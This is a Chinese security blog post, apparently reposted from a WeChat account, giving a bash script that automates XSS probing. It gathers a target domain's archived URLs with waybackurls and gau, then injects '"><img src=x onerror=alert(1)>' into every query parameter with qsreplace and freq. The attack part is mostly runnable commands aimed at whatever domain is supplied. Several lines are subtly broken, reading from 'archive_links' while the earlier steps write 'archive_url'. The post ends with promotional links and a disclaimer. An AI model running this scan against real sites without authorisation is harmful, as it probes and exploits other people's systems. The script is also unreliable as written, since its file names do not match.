自动化XSS脚本

admin 2023年7月16日14:47:33评论5 views字数 1521阅读5分4秒阅读模式

前言

本文内容如下:

  • 搜集url
  • 删除重复的url
  • 查找url中的参数并检查它们是否容易受到XSS攻击

搜集url

这里使用waybackurl和gau来搜集urls

命令行如下:

waybackurls example.com > archive_url
gau example.com >> archive_url
sort -u archive_links -o archive_url

删除相似和重复的urls

使用工具进行删除重复的urls(具体见文末)

cat archive_url | removeurltool | tee -a archive_url_out

查找url中的参数并检查它们是否容易受到XSS攻击

这里使用像qsreplacefreq这样的工具,地址为:

https://github.com/tomnomnom/qsreplace

https://github.com/marcusolsson/freq

将参数值替换为指定的负载。在这里的例子中,是" ><img src=x onerror=alert(1)>,你可以用自己的有效负载替换

命令如下:

cat archive_url_out | grep "=" | qsreplace '"><img src=x onerror=alert(1)>' | freq | grep -iv "Not Vulnerable" | tee -a freq_xss_findings

freq:统计输出中每行出现的频率。

整体脚本

整个流程脚本如下:

#!/bin/bash

echo "[+] Running waybackurls"
waybackurls $1 > archive_url
echo "[+] Running gau"
gau $1 >> archive_url
sort -u archive_links -o archive_url
cat archive_links | uro | tee -a archive_url_out
echo "[+] Starting qsreplace and freq"
cat archive_url_out | grep "=" | qsreplace '"><img src=x onerror=alert(1)>' | freq | tee -a freq_output | grep -iv "Not Vulnerable" | tee -a freq_xss_findings
echo "[+] Script Execution Ended"

运行命令如下:

./script.sh Target.com

回复remove即可获取删除重复urls工具

福利视频

笔者自己录制的一套php视频教程(适合0基础的),感兴趣的童鞋可以看看,基础视频总共约200多集,目前已经录制完毕,后续还有更多视频出品

https://space.bilibili.com/177546377/channel/seriesdetail?sid=2949374

技术交流

技术交流请加笔者微信:richardo1o1 (暗号:growing)

如果你是一个长期主义者,欢迎加入我的知识星球(优先查看这个链接,里面可能还有优惠券),我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款

自动化XSS脚本

往期回顾

2022年度精选文章

SSRF研究笔记

xss研究笔记

dom-xss精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips

原文始发于微信公众号(迪哥讲事):自动化XSS脚本

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月16日14:47:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   自动化XSS脚本https://cn-sec.com/archives/1881390.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息